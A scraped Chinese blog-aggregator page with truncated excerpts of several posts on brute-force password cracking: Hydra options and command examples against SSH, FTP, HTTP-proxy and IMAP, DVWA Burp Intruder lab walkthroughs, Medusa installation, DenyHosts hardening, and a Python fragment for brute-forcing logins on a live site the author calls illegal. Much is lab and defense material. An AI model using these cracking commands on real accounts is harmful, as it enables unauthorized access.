暴力破解

Hydra暴力破解工具

跟風遠走 提交于 2019-12-03 15:15:35
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]   参数解释如下。 -R 继续从上一次进度接着破解 -S 采用SSL连接 -s <port> 可通过这个参数指定非默认端口 -l <LOGIN> 指定特定的用户名进行爆破 -L <FILE> 指定用户名字典 -p <PASS> 指定特定的密码进行爆破 -P <FILE> 指定密码字典 -e <ns> n:空密码试探;s:使用指定的用户名和密码试探 -C <FILE> 使用冒号分割格式,如"admin:123456"来代替-L/-P -M <FILE> 指定目标列表一行一条 -o <FILE> 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t <TASKS> 设置线程数,默认是16个线程。 -w <TIMME> 设置最大超时时间,单位为秒,默认是30s。 -v/-V 显示详细过程 Server 目标IP Servicee 指定服务名

Windows安全加固系列-----应对ssh的暴力破解

匿名 (未验证) 提交于 2019-12-02 23:43:01
2019/6/14 ― 此文章是关于有效防范SSH的暴力破解,此处使用DenyHosts和SSH密钥认证的方法进行防范。 DenyHosts DenyHosts是Python语言写的一个程序,它会分析sshd的日志文件(/var/log/secure),当发现重 复的攻击时就会记录IP到/etc/hosts.deny文件,从而达到自动屏蔽IP的功能。 实验环境: kali linux 和 centos 7 两台Linux操作系统的主机。 这里准备了DenyHosts的压缩包。 链接: https://pan.baidu.com/s/1npQYI0l3H9dLt3-lcCZTOQ 提取码:u8p4 在Centos 7 上的操作 下载后,传到centos 7 中 解压 tar xzf DenyHosts-2.6.tar.gz 到这个目录下 cd DenyHosts-2.6 安装 python setup.py install 到这个目录下 cd /usr/share/denyhosts 创建配置文件 cp denyhosts.cfg-dist denyhosts.cfg 编辑这个文件 vi denyhosts.cfg 主要修改这个几个参数: DENY_THRESHOLD_INVALID = 5 ----> DENY_THRESHOLD_INVALID = 2 无效登录的用户登录2次锁定

DVWA-暴力破解

匿名 (未验证) 提交于 2019-12-02 23:26:52
DVWA-暴力破解 1.暴力破解 2.burp安装证书 3.万能密码 一、暴力破解 burp四种暴力破解类型: Cluster bomb 两个字典,两个参数,交叉匹配,所有可能  一、实验环境: 客户端:win10 服务端:win2003搭建DVWA 二、实验步骤: 1.安装phpstudy软件,搭建web服务器 2.把dvwa放到网站根目录下 3.修改DVWA配置文件,修改数据库密码 4.在客户端浏览器访问靶机,初始化DVWA    5.修改DVWA的级别为low 查看源码,可以看到没有对username和password参数进行任何过滤,直接放入到数据库中进行查询(存在万能密码漏洞),也没有对账户登录失败做任何限制(存在暴力破解漏洞)    6.设置burp代理,拦截数据包    7.设置浏览器代理    8.在win10上访问 http://192.168.10.130/dvwa ,点击Brute Force,随便输入用户名和密码,可以看到burp拦截到数据包    9.把截取的数据包发给intruder,修改intruder的参数    10. 选择攻击类型,加载字典    开始攻击,下图可以看到成功跑出密码    下图可以看到,暴力破解为同用户同密码          11.修改DVWA的级别为medium 分析源码可以看到,对账户登录失败做了时间限制(sleep 2秒)

如何通过Python暴力破解网站登陆密码

匿名 (未验证) 提交于 2019-12-02 22:54:36
首先申明,该文章只可以用于交流学习,不可以用于其他用途,否则后果自负。 现在国家对网络安全的管理,越来越严,但是还是有一些不法网站逍遥法外,受限于国内的人力、物力,无法对这些网站进行取缔。 今天演示的这个网站,就是属于非法的网站。 首先看登陆界面。 使用Post Form表单的形式,进行用户名和密码的提交。接下来我们看提交的用户名和密码。 我输入的密码和用户名一致,说明该站对提交的密码进行了处理,等一会我来看,密码是怎么处理的,现在我们看服务器的返回信息。 服务器返回的是JSON,到这一步,我们就差密码了,只要知道密码是怎么生成的,就能加速对用户密码的破解了。 查看网站的脚本,发现密码是先在本地做MD5处理之后,才发送到服务器的。 到了这一步,我们也就初步知道如何对该网站进行暴力破解了。 由于现在的人们在进行网站注册的时候,都是使用QQ邮箱进行注册的,因此我们可以先构建一个QQ邮箱,先判断盖邮箱存不存在,然后我们在判断密码正不正确。 现在我们的思路理清楚了,接下来直接上干货。 user_num_low = 111111111 user_num_max = 9999999999 user_nbr = user_num_low mutex=Lock() #构造用户邮箱 def get_user_nbr(): mutex.acquire(3) global user_nbr user

【渗透测试-web安全】DVWA-暴力破解

て烟熏妆下的殇ゞ 提交于 2019-12-02 08:42:44
【渗透测试-web安全】DVWA-暴力破解 基本思路 配置实操 登录系统 设置安全级别 burpsuite暴力破解 抓包 设置暴破内容 导入字典 开始暴破 基本思路 暴力破解首先应该做的是: 构建弱口令 构建常见用户名 根据对应的破解场景构建特定的用户名密码组合 配置实操 登录系统 设置安全级别 尝试Low安全设置下的暴力破解 构建常见用户名、密码组合 常见用户名 常见密码 常见用户名 常见密码 admin password root root test test administrator administrator manage abc123 system 123456 test123 qwerty 根据列表我们得知一共能够组成的组合是 7 * 7 = 49 中可能性的排列组合 burpsuite暴力破解 抓包 设置暴破内容 注:这里的Attack type应该设置成Cluster bomb的格式 导入字典 开始暴破 根据对应的数据长度我们能够判断正确的用户名密码: 如图我们能够知道对应的用户名是:admin 密码是:password 不同等级的破解难度肯定有巨大的差别所以日常进行破解的过程中时间可能会很久。 而且还有可能碰到很多反暴力破解的,比如设置IP黑名单、设置错误登录次数、设置每次登录错误后延时1分钟才能再次登录、设置验证码等 来源: https://blog.csdn

DVWA实验之Brute Force(暴力破解)- High

僤鯓⒐⒋嵵緔 提交于 2019-12-01 07:47:41
DVWA实验之Brute Force(暴力破解)- High 有关DVWA环境搭建的教程请参考: https://www.cnblogs.com/0yst3r-2046/p/10928380.html Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 这里我们先将安全等级设为 High 这里我们开始高级实验~ 服务器端核心代码 <?php if(isset($_GET['Login'])){ //CheckAnti-CSRFtoken checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php'); //Sanitiseusernameinput $user=$_GET['username']; $user=stripslashes($user); $user=mysql_real_escape_string($user); //Sanitisepasswordinput $pass=$_GET['password']; $pass=stripslashes($pass); $pass=mysql_real_escape_string($pass); $pass=md5($pass); //Checkdatabase

OWASP ZAP使用入门指南

隐身守侯 提交于 2019-12-01 05:37:50
安全性测试入门(一):Brute Force暴力破解攻击和防御 写在篇头: 随着国内的互联网产业日臻成熟,软件质量的要求越来越高,对测试团队和测试工程师提出了种种新的挑战。 传统的行业现象是90%的测试工程师被堆积在基本的功能、系统、黑盒测试,但是随着软件测试整体行业的技术积累和大环境,市场对于测试工程师的要求越来越全栈化,技术的突破是测试工程师的必修课。 安全测试就是测试工程师的高阶技能之一,不过安全性测试领域水非常深,对于普通测试工程师而言可能并不容易上手。 所以笔者准备写这个系列文章,做一个安全性测试入门级攻略。文章会采用DVWA项目,就其提供的几大模块,来进行安全性测试的初探和对安全性防御措施的简析。 1. DVWA - 非常脆弱的一个网页应用 DVWA- Damn voulnerable web application(直译就是:非常脆弱的网页应用-_-!!!),是UK的一家安全性研究机构发布的一套网站系统,专门用来展示网站安全性问题和防御机制。对于我们学习web安全性相关知识是一个很好的工具。 这套web项目可以在 http://www.dvwa.co.uk/ 官网由github下载。 DVWA的安装很简单,只要架设起本地的Tomcat+MySql服务器,将DVWA部署到相应目录即可。 部署完毕后,登录应用,可以在左侧的菜单中看到如下模块: 他们分别是Brute

使用Medusa美杜莎暴力破解SSH密码

丶灬走出姿态 提交于 2019-11-30 02:49:18
使用Medusa美杜莎暴力破解SSH密码 1、Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。 官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。 2、安装medusa ,手动编译和安装medusa [root@k5 ~]# yum install libssh2-devel libssh2-devel -y [root@k5 ~]# tar zxvf 2.2.tar.gz [root@k5 ~]# cd medusa-2.2/ [root@k5 medusa-2.2]# ./configure --enable-debug=yes --enable-module

Hydra之暴力破解二

房东的猫 提交于 2019-11-30 01:41:31
工具:Kali 版本:Kali 内置工具 Hydra 概要:介绍Hydra相关服务爆破的简单示例 SSH服务破解 hydra -l root -P /usr/share/wordlist/passwd.txt -V46 -e nsr -t 4 -s 22 192.168.223.10 ssh hydra -L /tmp/username -x 6:6:a -vVd46 -e ns -t 10 -f -t 1 -o /tmp/result -b text ssh://192.168.223.10 FTP/FTPS服务破解 hydra -L /username -P /passwd -f -V -e nsr -o /tmp/result -b jsonv1 ftp://192.168.223.10:21 Http-Proxy服务破解 hydra -l admin -P /passwd -V -e nsr -o /tmp/result -b text http-proxy://192.168.223.10 hydra -L /username -P /passwd -V -e nsr http-proxy://192.168.223.10:8080 Imap服务破解 hydra -l admin -p pass -V -e ns 192.168.223.10 -s 143 imap

Hydra之暴力破解一

烂漫一生 提交于 2019-11-30 01:41:23
工具:Kali 版本:Kali 内置工具 Hydra 概要:介绍Hydra相关参数以及暴力破解相服务 Hydra:暴力破解利器,可以对多种协议进行暴力破解。有SSH、FTP、HTTPS、POP3、 IMAP、 Http-Proxy、Telnet、Smb、Cisco、TeamSpeak等等各种服务。 通用格式: hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]] Hydra帮助文档: hydra -h 显示帮助文档,罗列出可用的参数及参数的解释;支持的服务协议,如图一所示: 图一 hydra参数及支持的服务 Hydra常用参数及释义: -s  PORT             如果服务不是默认的端口,在这里可以重新定义端口 -l  NAME  or  -L  FILE  -l表示指定一个用户名,-L则表示指定一个包含所有用户名的字典文件(路径) -p  PASS  or  -P  FILE  -p表示指定一个密码